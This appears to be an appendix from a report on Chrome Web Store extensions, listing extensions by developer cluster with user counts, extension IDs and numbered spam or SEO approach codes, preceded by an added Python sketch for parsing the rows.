Maps Scraper & Leads Extractor 646 nhefjmaiappfgfcagoimkgmaanbimphd 1, 2
Followers Exporter for Thread 174 nhlcgpbandlddfdmabpjinolcgfbmkac 2
Bulk Barcode Generator 105 odipjjckdnfbhnnkdacknhpojbabaocb 1, 2
Followers Tracker for Ins 7,000 ohfgngkhbafacegaaphcinpgmnmjknff 1, 2
Airbnb Scraper 124 ohgfipogdmabijekgblippmcbfhncjgn 2
TripAdvisor® Review Scraper 1,000 pkbfojcocjkdhlcicpanllbeokhajlme 2
Bulk QR Code Generator 154 pnmchlmkjhphkjnbjehfgdagonbjpipg 1, 2
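Each row in these tables packs four fields into one line: name, weekly active users, the 32-character extension ID, and the comma-separated approach numbers. Because names can themselves contain digits (e.g. "2048 Classic Game"), splitting on whitespace is unreliable; anchoring on the ID, which uses only the letters a-p, disambiguates. The following parser is a sketch inferred from the row layout above, not something defined in the report.

```python
# Sketch: parse one appendix row of the form
#   "<name> <weekly active users> <32-char extension id> <approach numbers>"
# The layout is inferred from the tables above; the lazy name group plus the
# strict [a-p]{32} ID pattern keeps digit-bearing names from being misread.
import re

ROW = re.compile(
    r"^(?P<name>.+?)\s+"          # extension name (may contain digits)
    r"(?P<users>[\d,]+)\s+"       # weekly active users, e.g. 2,000,000
    r"(?P<ext_id>[a-p]{32})\s+"   # Chrome Web Store extension ID
    r"(?P<approaches>\d+(?:,\s*\d+)*)$"  # approach numbers, e.g. 1, 2, 4
)


def parse_row(line: str) -> dict:
    """Split an appendix row into its four fields."""
    m = ROW.match(line.strip())
    if not m:
        raise ValueError(f"unparseable row: {line!r}")
    d = m.groupdict()
    d["users"] = int(d["users"].replace(",", ""))
    d["approaches"] = [int(x) for x in d["approaches"].split(",")]
    return d
```

For example, `parse_row("FontSpotter 2,000,000 cncllbaocdclnknlaciemnogblnljeej 1, 2, 4, 6")` yields the name, an integer user count, the ID, and the approach list as separate values.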

Lazytech

Name Weekly active users Extension ID Approaches
Twitter Comment Export Tool 1,000 ajigebgoglcjjjkleiiomgbogggihibe 1, 2
AliExpress Images Downloader 1,000 ajnfoalglmknolmaaipgelpbdpcopjci 1, 2
Slack Translator Pro 475 ajoplaibmnoheaigdnfbagfchnnjkicc 1, 2
Whatsapp Translator Pro 2,000 bnbighhfhbnkoinbakcadadhjhjhnogo 1, 2
Discord Translator Pro 2,000 bpgmpnpdklkcdgiemflkhfhbcibbimhh 1, 2
Threads Followers Exporter 447 cackmcfbjdjnicnoifjcbpbidfnodfid 1, 2
Telegram™ Translator - Immersive Translation 1,000 cadnjdgggbmgmiokgmbngklhlldabhom 1, 2
Twitter Auto Unfollow Tool 1,000 cdejkfmlkpdipdjlookbmifhlihdefld 1, 2
FB Group Export Tool 1,000 cfkelnkpomgldoeoadoghdjcejdknilb 1, 2
Etsy Images Downloader 367 clcjlefnlochgjgmhkkmggojbcckloel 1, 2
Snapchat Translator Pro 58 degekmdjhceighgpmeociiolpbpdfmkk 1, 2
Skype Translator Pro 30 dheinobepcdickihlphioifoadnnlddn 1, 2
YouTube™ Comment Translator Pro 2,000 dkleeapinhlpifbijbppjcbgiolpagjd 1, 2
IG Followers Exporter 2,000 dncpodlbhbfeckciihiifmfpepleaked 1
Contact Saver for WhatsApp 2,000 dnoeodfoipnecbnnjhgoopnheicjlemm 1, 2
FB Messenger™ Translator - Immersive Translation 1,000 eeagfonlpjdegifbbipcnbhljledonnc 1, 2
Twitter AutoFollow Pro 1,000 elnglbaphfoebenjdbkalpgghijpnklp 1, 2
IG Auto Liker 1,000 fajlpeonkickmgcbmpnmdofghngjphac 1, 2
IG Auto Unfollow 1,000 fcapaeipdkdbongbphfbccnegbcbilah 1, 2
Indeed Scraper 44 fedomnahgimendnjeifhhgehimjidnof 1, 2
Lazada Images Downloader 1,000 fgefgonmnflpghpipmaajgagfekcdljp 1, 2
IG HashTag Export Tool 1,000 gddkmjkdanijaiogljcfnhaolephjfcj 1, 2
FB Messenger Translator Pro 1,000 gfmklfdiaiefelfoklndfcchmdopjcke 1, 2
TG Downloader - Photos, Videos, Audios 1,000 gihehopmfgnaknmbabddbkkebbaopeee 1, 2
Bumble Swipe Bot - Auto Filter & Swipe 955 gikinafmdccpecjbmnbjkeiadcabffpb 1, 2
Twitter Followers Exporter 1,000 giplfbjnmilhalcaehoblaegpkgembpi 1
Twitch Translator Pro 1,000 gmaglilejboehglachimajmepgjckjng 1, 2
Shein Images Downloader 1,000 hamgafmfcmaipelffjbdgikejedlnbmm 1, 2
eBay Images Downloader 1,000 hedppplfdackfbdjienfgbmecbnldijl 1, 2
IGEmail - Instagram Email Scraper 1,000 hgonoojgigfaikonjkhchoklgjoiphio 1, 2
Twitter Follower Export Tool - Export Followers / Following 1,000 hncbinceehncflccpnanfdnbinhjlleh 1, 2
IGFollower - IG Follower Export Tool 2,000 iindafjcdjddenmiacdelomccfblfllm 1, 2
FB Comments Export Tool 1,000 inooeahlmjlhjdblojocgcoohmpjbhif 1, 2
IG Auto Follower - Auto Follow / Unfollow 1,000 ipmahbofhgomnebimjlocmemobaamnfp 1, 2
Apollo Exporter 867 joainhjiflchdkpmfadbencgeedodiib 1, 2
Temu Images Downloader 1,000 jonloekipbhbjfcdpicecchjhhoidncn 1, 2
TikTok Follower Export Tool 1,000 kcoglbpmmjallcceanhiafgdlhofocml 1, 2
Twitter Comments Exporter 1,000 kdcgillnpmlfacikljeafiikgcpdjiha 1
IG Growth Pro - Auto Follow & Unfollow 2,000 kdibmenfbafnmjineglfmlbnmckhceej 1
Telegram Translator Pro 1,000 kkafjojibijigkcpgiidnphfnhdnopnf 1, 2
Twitter Auto Unfollow 1,000 lfofoljipingdgmjdmleonbnkecfbjli 1
Discord Chat Export Tool 1,000 lmoceiadfbnpofjbmgemloenlfkhhbhl 1, 2
Amazon Images Downloader 1,000 mjkalljfgchhnjekdgkennpimdobfjfa 1, 2
Twitter Auto Follower - Auto Follow / Unfollow 1,000 mmaekkgncaflnfaimjaefjohpgneagnh 1, 2
Twitch™ Translator - Immersive Translation 1,000 ndjfdohpdlajffmmhdlifafoihibnokb 1, 2
Discord™ Translator - Immersive Translation 1,000 nenhidhfpjbccpbikiceenfnchkhljmd 1, 2
IG Comment Export Tool 1,000 ngigmhodcdcjohafngokbkmleidkigfn 1, 2
IG Comments Exporter 1,000 nogopabibhapbfcnlfeandndkalcjkik 1
Slack™ Translate 253 ogeieigjomecilgfebkdbgdckfpbjfah 1, 2
IGEmail - Email Extractor and Scraper for Ins 1,000 ohhcmiegflabbcfihgjkkndpgijmpghk 1
IG Auto Like Tool 1,000 ohocmgfknbibgiiijhokjifkhpgpahbb 1, 2
IG HashTags Exporter 1,000 pgbenbeencahnighlkhingagogpjjdbh 1, 2
Whatsapp™ Translator - Immersive Translation 1,000 phafeggjhdhfcmlanhmgbmcbgocapnik 1, 2
TikTok Comment Export Tool 1,000 pjjldehmkcnmmkldjielbonlnmbkomlm 1, 2
IG Unfollow Pro 1,000 pmlkkhcpimkhgalapkfpiknklhalkoeo 1
Tinder Swipe Bot - Auto Filter & Swipe 644 poocdjijjpnkcmhjecpeicdhljbmgddc 1, 2

Yue Apps

Name Weekly active users Extension ID Approaches
Etsy Images Downloader 115 aakfimfbjikfkfeokmamllkomlejnpdi 1, 2
Export Twitter Follower 1,000 amflfbkcoeanhfcdcbebeimpjnoebakn 1, 2
Export TikTok Followers 378 bdhcflkeglekljebdpanedpgeojpfefj 1, 2
IG Auto Follow 19 cpfdfhmnheohcfiddlpjgjjdhgmnnali 1
Twitter Unfollower 536 eilkgadngbcjchnpmndgafhaihmohfho 1, 2
Twitter Auto Follow-Unfollow 447 fmkhphcddlhkmggaldkibecjmgpkbpdl 1, 2
Shein Scraper 26 gpbhomcniappgbcehfedaliofagbfado 1, 2
IG Auto Like 1,000 hmgfjlghckknhafggpnnniffdiggdmpd 1, 2
IG Follower Export Tool 3,000 iacchdhbljnmihoeeelcgljnajfafpkh 1, 2
IG Auto Follow 928 icjfkeibgfjfkdfjjgafpkpfplpnbidc 2
Contacts Exporter for WhatsApp 28 ifhjahdgkdcpeofnamflcpdkadijbifl 1
IG Auto Follow 5,000 iiaohnpoogjkomcdkhdfljgpglejpaad 1, 2
Shein Images Downloader 1,000 lphjpapkpnhhffgobpekcmeanpompeka 1, 2
IG Auto Unfollow 77 mpmpkpbmimeinhimdkbcecbbmgcacndp 1, 2
TwExport - Export Tweets From Any Account 972 nahaggbplpekgcbbnemjlpnnmpmhnfkh 1, 2
Export Group Members for Facebook 40 oakdlcfhapgllacidemajdmmdcjfbiig 2
Unfollowers Pro 3,000 onkeebndjchpacfplcfojadeedlfdime 1, 2, 7
Export Tweet From Any Account 167 opbkmlokpjccgjmffhpndbjahhkbnhon 1

Chrome Extension Hub

Name Weekly active users Extension ID Approaches
TG Sender - telegram messages bulk sender 462 baghjmiifdlhbnfiddfkoomfkhmiamle 1, 2
IGEmail - Email Extractor and Scraper 1,000 cnjelbflcpdehnljcmgolcbccfhgffbn 1
Ins Comment Bot - instagram automated comment bot 22 dlfigaihoneadjnenjkikkfehnpgbepo 1, 2
IGFollow - Follower Export Tool 546 efjeeadgcomeboceoedbfnnojodaonhj 1, 2
IGCommentsExport - Export Comment for IG 39 fahielldgamgakbecenbenagcekhccoj 1
Unsubscriby for Youtube 42 gcmfheliiklfcjlbnmeahfhmcbjglncl 1, 2
Airbnb Scraper 32 ioblhofpjfjbfffbibgkjiccljoplikf 1, 2
TG Downloader - Telegram Video Download 2,000 kockkcmeepajnplekamhbkgjomppgdhp 1, 2
IGPost - Export Instagram photos and videos 70 mdhgjlmpioeeainbfmodgcaajgchapnm 1, 2

Infwiz

Name Weekly active users Extension ID Approaches
WAAutoReply - Web Automatic Reply Assistant 47 bilbhjhphaepddlmheloebigdkafebmg 1, 2
Reaction Exporter - Extract Like, Love, etc. 168 cddgoecgoedcodpohjphbhfdhojlpfik 1, 2
WAChecker - Check, Verify & Filter Number 3,000 cmelkcfmckopkllanachmbnlfpkhnjal 1, 2
IGGrowth - auto follow and unfollow 1,000 eggdbehenjijmhlbiedecgkehgeilemo 1, 2
IGCommentsExport - Export Comment for IG 5,000 ejneclajijjhnnelphnggambomegmcpd 1
Jobs Scraper for Indeed 16 fbncpljgpiokofpgcedbfmbnpdmaofpj 2
Job Scraper for LinkedIn™ 64 hhddcmpnadjmcfokollldgfcmfemckof 1, 2
Social Profile Info - User Info Lookup From URLs & IDs 47 jcmhjgllmdnlfabkppegglnmkmlheopp 1, 2
Chewy Reviews Scraper - Images 8 jhgpmldoffheafnogmaihhgjpoecmgea 1, 2
Comment Exporter - Extract Comments 866 knpbmoflfeeokanhpkiofaoaohpgfbjh 1, 2
Message Sender - Web Sender 7,000 ldhmkpfefdgmbgmmcldnnjokfjjnldmf 1
Download Group Phone Numbers 8,000 mhlmhjlkpioopoipgbmcmiblopmmecjc 1
Friend Exporter - Extract friends list 993 ncekbecnpnoiapeghdneaihmeokakpdp 1, 2
Zillow Scraper - Extract Data from Zillow 2,000 nlieamdebnjhijflpbkbaijnjpdpieoh 1, 2
Friend Requests Sender 201 padhkflcigakphahffhcgfnfiddimngo 1, 2
IGFollow - Follower Export Tool 100,000 pkafmmmfdgphkffldekomeaofhgickcg 1, 2

NioMaker

Name Weekly active users Extension ID Approaches
Friend Requests Sender 113 bgdjlbjaemhokfkkjiplclhjjbmlhlof 1, 2
Lead Exporter for Apollo 2,000 fhlfdnhddefmfmmehofnbnkmcbgdlohn 1
Yelp Scraper: Scrape Yelp business data 46 fnoknmcjgfgepgngbkeefjgeikbdenki 1, 2
Followers Everywhere for LinkedIn™️ 38 kdopjbndoijfnnfijfkfponmllfomibn 1

FreeBusinessApps

Name Weekly active users Extension ID Approaches
Twitch Chat for Full Screen 4,000 bgopmpphpeghjpififijeoaojmmaiibh 6
Free Time Clock for Google Chrome™ 3,000 bhcdneenlaehgbonacefkpjddbomfpkj 6
SQLite Viewer 9,000 bpedjnknnoaegoaejefbodcdjmjkbbea 5
ESports Tournament Schedule 111 caocacliklpndkcbdcbfcjnelfaknioi 6
Volume Booster 1,000 cejhlkhieeooenehcfmcfgpcfjdhpkop 1, 2
Sketchpad for Google Chrome 7,000 dbhokcpgjhfjemonpglekkbmmjnkmolf 6
Audio Equalizer for Youtube™ 20,000 dcjnokfichnijppmkbgpafmdjghibike 1
Notepad - Take Notes And Weekly Planner 10,000 dfiojogmkjifkcckhabcedniponnmifp 6
Rubiks Cube for Google Chrome 9,000 dlabgdldanmcjlmnifgogbnffionmfki 6
CSS Selector 10,000 dobcgekgcmhjmfahepgbpmiaejlpaalc 6
Icon Finder 1,000 eblcidnbagkebkmakplgppmgecigpaef 5
Enable JavaScript 10,000 egljjlhdimceghlkloddalnlpgdgkboj 6
Page Marker for Google Chrome™ 6,000 ejfomipinjkencnfaaefmhgkipphodnc 6
Customized Scrollbar 977 elchgoiagofdppjcljnecjmekkkgjhhi 6
Compress Video Files 10,000 gbffnccbjahakeeailfjmdbhnccklcgp 6
Password Generator 4,000 gbgffmpdbclmicnofpdbdmmikppclhmf 6
Speaker Booster 8,000 gkfjamnmcjpbphincgfnagopcddfeakd 1
Fast Search for Google Drive™ 443 glhpjfhpachnbgipcookemmoocedfjgp 6
Dark Mode for Messenger 273 hajjeoobbdpmbicdnkpoggllfebkmbfb 6
Earth 3D View Map 8,000 hfnflfnjflibmhoopdbndehehbhgjcem 6
Reactions for Google Meet 40,000 hicfolagolebmjahkldfohbmphcoddoh 6
Date Time 7,000 hjiajhckbofggdeopalpnpmapekkjcmi 6
Image Editor 10,000 hpiicbccakkjfojofhjcjhbljnafdfbg 4
Picture in Picture for Videos 20,000 icmpjbkbjlbfpimllboiokakocdgfijb 6
Mute Tabs 2,000 ijidbphagpacfpkhgcjfbdjohkceanea 6
Copy To Clipboard 8,000 imjkddkepakidnmolhmpfldheaiakojj 6
Tab manager 3,000 iofngkkljgebpllggmdpcldpifhdckkg 6
Online Radio for Google Chrome™ 4,000 jlfegkfcihbbpiegahcpjjidojbhfglo 6
Custom Dark Mode 3.0 for Youtube, Facebook 795 jpgkbhploimngoikjnmggchkcekleehi 1, 2
Make Text Readable for Google Chrome™ 1,000 kicekkepbmfbaiagdcflfghmnnachmdg 6
Online Download Manager 10,000 kilhigaineblocfbpikplhgaacgigfnb 6
Gmail Adblocker 1,000 kkddllkaglcicbicjlobbhmjjangamjh 5
Testing Reading Speed 4,000 kmkdgnfgallnjpdldcmplbggbmkgcgdl 6
User Agent Switcher 1,000 lbdmdckajccnmklminnmlcabkilmhfel 5
Highlighter for Google Chrome™ 50,000 lebapnohkilocjiocfcaljckcdoaciae 6
Free Spell Checker for Google Chrome™ 20,000 ljgdcokhgjdpghmhdkbolccfcfdbklpo 6
IMDB Ratings on Netflix 314 lkfapihkchheoddiodedjlapfdnmgkio 6
Adjust Screen Brightness for Browser 5,000 lkomnldkbflfbkebenomadllalainpec 6
Timer for Google Meet 10,000 lmkdehdoopeeffkakbbkfcmmhmeoakpk 6
Make Screenshot for Chrome™ 1,000 mhnppmochppgeilojkicdoghhgfnaaig 1
Full Page Screenshot for Google Chrome™ 10,000 mieibeigpaehbjcbibakjcmkocngijjl 6
Custom Progress Bar for YouTube™ 300,000 nbkomboflhdlliegkaiepilnfmophgfg 6
Chrome Bookmarks 4,000 nhcaihbjbbggebncffmeemegdmkamppc 6
Tab Snooze 336 nomolokefbokmolefakehdnicdpjbmnm 5
History & Cache Cleaner 10,000 oiecpgbfcchalgdchgoplichofjadhmk 5
View Chrome History 40,000 oiginoblioefjckppeefcofmkkhgbdfc 6
Meme Maker for Google Chrome 2,000 oipbnbggobjonpojbcegcccfombkfoek 6
Bass Boost for Google Chrome™ 20,000 omobmjpbljcbgdppgjfmmennpjpgokch 6
Knit Patterns 181 pfeenapookpacnhhakoilppnmbohncml 6
Tic Tac Toe 3,000 pfghhddjhifjcneopigibnkifacchpgh 6
Clear History & Web Cache 3,000 pjhgdolnnlcjdngllidooanllmcagopf 6
Citation Manager for Google Chrome™ 20,000 pkbcbgfocajmfmpmecphcfilelckmegj 6
Full screen your Videos 3,000 pkoeokeehkjghkjghoflddedkjnheibp 6
iCloud Dashboard 10,000 pnncnbibokgjfkolhbodadgcajeiookc 6
Responsive Tester 30,000 ppbjpbekhmnekpphljbmeafemfiolbki 6

Everything else

Most extensions listed below either belong to one of the clusters above but haven’t been attributed to it, or belong to a cluster that wasn’t significant enough to list separately. In a few cases, however, these could be extensions by individual developers who simply went overboard with search engine optimization.

Name Weekly active users Extension ID Approaches
Simple = Select + Search 20,000 aagminaekdpcfimcbhknlgjmpnnnmooo 6
AI Chat Bot 1,000 abagkbkmdgomndiimhnejommgphodgpl 1
ChatGPT Translate 20,000 acaeafediijmccnjlokgcdiojiljfpbe 1
The AllChat - ChatGPT, WhatsApp, Messenger 1,000 adipcpcnjgifgnkofmnkdbebgpoamobf 1, 4
save ChatGPT history to evernote 1,000 afcodckncacgaggagndhcnmbmeofppok 3
Sound Booster 1,000 ahhoaokgolapmhoeojcfbgpfknpmlcaj 1, 2, 4
Dictionary - Synonyms, Definition, Translator 40,000 ahjhlnckcgnoikkfkfnkbfengklhglpg 1, 3, 4
ContentBlockHelper 20,000 ahnpejopbfnjicblkhclaaefhblgkfpd 6
Video Speed Controller 250 aiiiiipaehnjdjgokjencohlidnopjgd 4
Black Jack Play Game 20,000 akclccfjblcngnchpgekhijggnibifla 5
Free VPN - 1VPN 600,000 akcocjjpkmlniicdeemdceeajlmoabhg 1, 3, 5
Browser Boost - Extra Tools for Chrome 80,000 akknpgblpchaoebdoiojonnahhnfgnem 5
Comet - Reddit Comments on YouTube & Webpages 9,000 amlfbbehleledmbphnielafhieceggal 1, 2, 5
Hololive Wallpaper 2,000 anjmcaelnnfglaikhmfogjlppgmoipld 6
Roblox Wallpaper 9,000 ankmhnbjbelldifhhpfajidadjcammkg 5
Video Downloader Global - videos & streams 20,000 baajncdfffcpahjjmhhnhflmbelpbpli 1, 2
super cowboy play game 472 bconhanflbpldbpagecadkknihjmlail 5
Paint Tool for Web 3,000 bcpakobpeakicilokjlkdjhhcbepdmof 5
Sound booster by AudioMax 900,000 bdbedpgdcnjmnccdappdddadbcdichio 1, 2, 4
Save to Face Book. From web to Saved FB 63 bdhnoaejmcmegonoagjjomifeknmncnb 1, 2, 6, 7
Save ChatGPT to Obsidian markdown file 641 bdkpamdmcgamabdeaeehfmaiaejcdfko 7
Full Page Screenshot: ScreenTool.io 6,000 bfhiekdkiilhblilanjoplmoocmbeepj 1, 5
Downloader for Instagram - ToolMaster 100,000 bgbclojjlpkimdhhdhbmbgpkaenfmkoe 1, 2
Aqua VPN 20,000 bgcmndidjhfimbbocplkapiaaokhlcac 1, 2, 3, 4, 7
ChatGPT Assistant - Smart Search 178 bgejafhieobnfpjlpcjjggoboebonfcg 1, 2, 4, 7
Xiaojinshu - Xiaohongshu material downloader (video, picture) 2,000 bhmbklgihbfcpbnaidlcanmbekbjoopg 1
Save ChatGPT to Notion 5,000 bknieejaaomeegoflpgcckagimnbbgdp 3
Football Wallpapers 1,000 blaajilgooofbbpfhdicinfblmefiomn 6
Image downloader - picture and photos saver 500,000 cbnhnlbagkabdnaoedjdfpbfmkcofbcl 1, 2, 4, 6
IG Follower Export Tool - IG Email Extractor 1,000 cekalgbbmdhecljbanbdailpkbndbbgj 1, 2
Happy Chef Bubble Game 668 celnnbmadnnifmnaekgeiipiadahpide 5
midjourney to notion 1,000 ceoifmkmbigkoodehbhfeegbngoomiae 3, 4
Dragon Ball Z Wallpaper 10,000 cepfoomofdcijdlpinanbciebkdmmddm 5
Change Default Search Engine 7,000 cfikbclbljhmmokgdokgjhnpinnmihkp 5
Indeed Scraper 425 cgelphinochnndbeinkgdjolojgdkabc 1
Story Space. Anonymous viewer for IG and FB 10,000 cicohiknlppcipjbfpoghjbncojncjgb 1, 2
Classic Dark Theme for Web 700,000 ckamlnkimkfbbkgkdendoedekcmbpmde 1, 2, 4
ai platform 687 cklkofkblkhoafccongdmdpeocoeaeof 1
AI Art Generator 697 cllklgffiifegpgbpaemekbkgehbeigh 6
Twitter Algorithm Rank Validator - Free Tool 31 cmgfmepnimobbicpnjhfojjibhjdoggo 1
Adblock - adblocker for Youtube 700,000 cohnbaldpeopekjhfifpfpoagfkhdmeo 1, 2, 3, 7
Bass Booster - Сontrol your sound 800,000 coobjpohmllnkflglnolcoemhmdihbjd 1, 2, 4, 6
SearchGPT Powered 30,000 cpmokfkkipanocncbblbdohjginmpdjn 1, 2
Maps Scraper & Leads Data Extractor 800 dahoicbehnalbeamhcpghhoelifghbma 6
Wasup WA Sender 4,000 dcmcongoliejhianllkdefemgiljjdjl 5
Popup Blocker - Adblock Pop up 10,000 ddbjkeokchfmmigaifbkeodfkggofelm 1, 2, 3, 4
AI Avatar Generator 528 ddjeklfcccppoklkbojmidlbcfookong 6
Telegram Video Downloader 10,000 ddkogamcapjjcjpeapeagfklmaodgagk 1, 2
GetJam - find Coupons and Promo codes 10,000 deamobbcdpcfhkiepmjicnlheiaalbbe 1, 2, 3, 7
WiFi speedtest & Internet Connection Test 10,000 deofojifdhnbpkhfpjpnjdplfallmnbf 1, 2, 4
Audio Master mini 900,000 dfffkbbackkpgmddopaeohbdgfckogdn 1, 2, 4
Geometry Dash Wallpaper 1,000 dghokgbfkiebbjhilmjmpiafllplnbok 5
ExportShopify 63 dgofifcdecfijocmjmdhiiabmocddleb 5
Bass Booster Lite 1,000 dhempgjfckmjiblbkandmablebffigdj 1, 2, 4
IG Follower Export Tool - Export Follower List Instagram - IG Tools 343 dhmgjkbkpjikopbkgagkldnoikomgglo 1, 2
Custom Youtube 64 dieglohbkhiggnejegkcfcpolnblodfj 1, 2
Math AI 10,000 dioapkekjoidbacpmfpnphhlobnneadd 1, 2, 7
Batch Save ChatGPT to Notion 176 djefhicmpbpmmlagbgooepmbobdhajgn 7
Night Theme for Web 786 djkdplhjjhmonmiihoaipopjfjalelkb 1, 2, 4
TickerIQ 200,000 dlaajbpfmppphhflganljdalclmcockl 1, 2, 4
Screen Recording 10,000 dlcelhclgobpnegajplgemdhegfiglif 1, 4
Retro Video Downloader 3,000 dnbonfnabpogidccioahmeopjhbcojoe 1, 2, 4
View Instagram Stories - InstaStory 288 dpckdamgkbgkhifgpealdkekennmkjln 1
City Bike Racing Champion Game FEEP 471 dpkpeppcigpkhlceinenjkdalhmemljn 5
ChatGPT for WhatsApp 7,000 eacpodndpkokbialnikcedfbpjgkipil 5
Vibn AI - ChatGPT: AI-Powered Browsing 20 ealomadpdijnflpgabddhepkgcjjeiha 2
sync evernote to notion 72 edppbofcdhkllmbbhnocaenejjlcjoga 2, 4, 7
Email Extract Pro - Simplify Lead Generation with Notion 606 eebaoaeanohonldcbkpnjfkdlcbcaond 2, 3, 7
Bass Booster - Sound Master Pro 200,000 eejonihdnoaebiknkcgbjgihkocneico 1, 2, 4
Ever2Notion 148 efolkkdddgjcnnngjefpadglbliccloo 3
Claude to Obsidian 217 ehacefdknbaacgjcikcpkogkocemcdil 1
Auto Tab Saver Pro 14 ehdnfngedccloodopehbfgliancjekhi 1, 3
Tricky Craby Html5 Game 7,000 eifmecggecobbcjofbkkobpbjbdifemc 5
Dark Mode - Dark Reader for Chrome 60,000 eiionlappbmidcpaabhepkipldnopcch 1, 2
Beautiful Nature Pictures Wallpaper 1,000 eilemfgfflhnndcaflanfgmohfjgbgof 6
Email extract 400,000 ejecpjcajdpbjbmlcojcohgenjngflac 1, 2, 4
Screen recorder - Recorder Tool 84 ekgimgflikldcmjmeeecnkdenimhamch 5
Soccer Online Game Football - HTML5 Game 40,000 eknjiacpaibimgjdeldfhepofgjkngck 6
Crazy Cursors - Custom Cursors with Trails 14 enncggclkhfdeoaglhjkieeipkboaecd 1, 3
Lumberjack River Game 1,000 fbgkmgkcneoolclpopjahcdogpbndkcl 5
Vroxy - Spoof Time Zone, Geolocation & Locale 1,000 fcalilbnpkfikdppppppchmkdipibalb 1, 5
Linkedin Job Scraper - scraper.plus 948 fcfbdnejkoelajenklbcndfokempkclk 3
Music Equalizer for Chrome 500,000 fedoeoceggohfajbhbadkfhgckjkieop 1, 2, 4, 6
Safety Web - Adblock for Web 2,000 ffafhlldnfofnegdfhokdaohngdcdaah 4, 5
IG Likes Export 1,000 fiefnmddjghnmdjfedknoggjfcfejllm 2
Free YouTube Comment Finder - EasyComment 1,000 fifgmgcoibgcehfbpeifpipjnmfdjcoi 1, 5
Classic Brick Game 80th 7,000 filjhgipogkkmalceianiopidelcacam 1, 2, 4, 6
IG Follower Export Tool - IG Lead Scraper 48 fimgpffhikpemjcnfloodfdjfhjkoced 5
Instagram Photos Download - InstaPhotos 381 fjccfokbikcaahpgedommonpjadhdmfm 1
Save Twitter&Linkedin People to Notion CRM 61 fjhnpnojmkagocpmdpjpdjfipfcljfib 1, 2, 3
Life HD Wallpapers New Tab 787 flbglpgpbekkajkkolloilfimbaemigj 1
INSORT - Sort Reels for IG 334 fmdndpmffplgenajipolmpfhflmgdpla 5
Indeed Scraper 467 fnmcgefncfbmgeafmdelmjklpblodpnc 1, 2
Grand Commander 1,000 fnpedebmmbanjapadpnoiogjjhnggdca 5
Succubus HD Wallpapers New Tab Theme 126 gahampmajaohlicbcpdienlhclhkdgcg 1, 6
Attack On Titan Live Wallpapers 6,000 gajcknbeimpoockhogknhfobnblpkijk 6
Red And Black Shards 9,000 gamplddolbodndilnmooeilfcmdjkjfn 6
Free VPN Proxy - NoName VPN 1,000 gceoelahanekobagpkcelbhagpoaidij 4, 5
GPT Booster - ChatGPT File Uploader & Chats Saver 9,000 gcimiefinnihjibbembpfblhcmjclklo 1, 2, 6
GPT Sidebar - Search with ChatGPT 900,000 gcmemiedfkhgibnmdljhojmgnoimjpcd 1, 2, 3, 4, 6
IG Reel Download - InsReels 194 gcofmhbhbkmagfcdimaokhnhjfnllbek 1
Chrome Capture - screenshot & GIF 300,000 ggaabchcecdbomdcnbahdfddfikjmphe 4
Audio Equalizer 551 ggcffjkfphpojokoapldgljehpkiccck 1, 2, 4
GPTs Store Search and Favorite GPTs 735 ggelblabecfgdgknhkmeffheclpkjiie 3
League of Legends Wallpaper 1,000 giidhjojcdpaicnidflfmcfcnokgppke 5
Video Downloader Button 9,000 gjpdgbkjopobieebkmihgdoinbkicjck 1, 2, 5
Screen Virtual Keyboard- specific needs tool 9,000 gkiknnlmdgcmhmncldcmmnhhdiakielc 4, 6
Just Video Downloader 5,000 gldhgnbopkibmghhioohhcjcckejfmca 1, 2, 4
Picture in Picture - floating video player 1,000,000 gmehookibnphigonphocphhcepbijeen 1, 2, 4
Sound Booster 10,000 gmpconpjckclhemcaeinfemgpaelkfld 1, 2
Hive - Coupons, Promo Codes, & Discounts 2,000 godkpmhfjjbhcgafplpkaobcmknfebeh 1, 2, 3
Profile Picture Maker - AI PFP Maker 202 gonmpejcopjdndefhgpcigohdgjkjbjc 6
Traffic Car Racing Game 10,000 gpchpdllicocpdbbicbpgckckbkjdago 6
Mass Delete Tweets - Tweet Deleter 1,000 gpeegjjcnpohmbfplpkaiffnheloeggg 1, 5
Microsoft Word Translator - Translate Word online 974 gphocmbdfjkfghmmdcdghoemljoidkgl 3
Better Color Picker - pick any color in Chrome 20,000 gpibachbddnihfkbjcfggbejjgjdijeb 5
Popup and Ads Blocker 20 hadifnjapmphiajmfpfgfhaafafchjgh 1, 2, 3
Sound Equalizer 50,000 hckjoofeeogkcfehlfiojhcademfgigc 1, 2, 4
Multi Ad Blocker Complete for Youtube™ 4,000 hdoblclnafbfgihfnphjhadfpgcmohkp 1
Video Downloader pro 1,000,000 hebjaboacandjnlnhocfikmaghgbfjlp 1, 2, 4
WAFilter - Check & Verify WA Number 5,000 hhfjicmmlbnmbobgpfmdkodfjkibogog 1, 5
Translator - Click to Translate 10,000 hhmocdjpnopefnfaajgfihmpjpibkdcj 1, 2, 3, 4, 5
Funny Tweet Generator 241 hhpmgfhnfdifcjgmgpgfhmnmgpiddgbg 1, 5
Winamp Classic Equalizer 1,000 hibihejapokgbbimeemhclbhheljaahc 1, 4
ChatGPT plugin search 893 hjdhbhggcljjjfenfbdbbhhngmkglpkl 3
ReminderCall Chrome Ext. 287 hlblflbejmlenjnehmmimlopeljbfkea 1, 3
Automatic ChatGPT Translator: Prompt Genie 1,000 hlkbmbkcepacdcimcanmbofgcibjiepm 3
AI Editor For Xiaohongshu™ - XHSPlus 2,000 hmeohemhimcjlegdjloglnkfablbneif 1
Cute Dog Wallpaper HD Custom New Tab 10,000 iaaplcnlmmnknnbhhpedcaiiohdepiok 6
Adblocker for Web 3,000 icegiccppplejifahamjobjmebhaplio 1, 2, 3, 4
Email scraper & Email Extract 73 ichccchniaebdhjehjcpmiicifhccpem 1, 5
Tomba - Email Finder & Email Extractor Plus 9,000 icmjegjggphchjckknoooajmklibccjb 5
Comment Exporter - Export Ins Comments 454 idfcdgofkeadinnejohffdlbobehndlf 1, 2
Get Color Palette from Website 75 idhdojnaebbnjblpgcaneodoihmjpdmo 1
Itachi Live Wallpaper 9,000 ihmlfoinmmfmcdogoellfomkcdofflfj 6
Eclincher 905 iicacnkipifonocigfaehlncdmjdgene 5
QRCodie - QR Code Generator 20 iioddhggceknofnhkdpnklfopkcahbkc 1, 2
Shorts blocker for Youtube 100,000 iiohlajanokhbaimiclmahallbcifcdj 1, 2, 4, 6
App Client for Instagram™ - InLoad 800,000 ikcgnmhndofpnljaijlpjjbbpiamehan 1, 2, 4, 6
FollowFox - IG Follower Export Tool (Email) 970 imoljjojcgjocfglobcbbhfbghpdjlfn 1, 2
chatgpt partner - Your AI Assistant 778 infgmecioihahiifibjcidpgkbampnel 4
Zombie Shooter Play 5,000 iohppfhpbicaflkcobkfikcjgbjjjdch 5
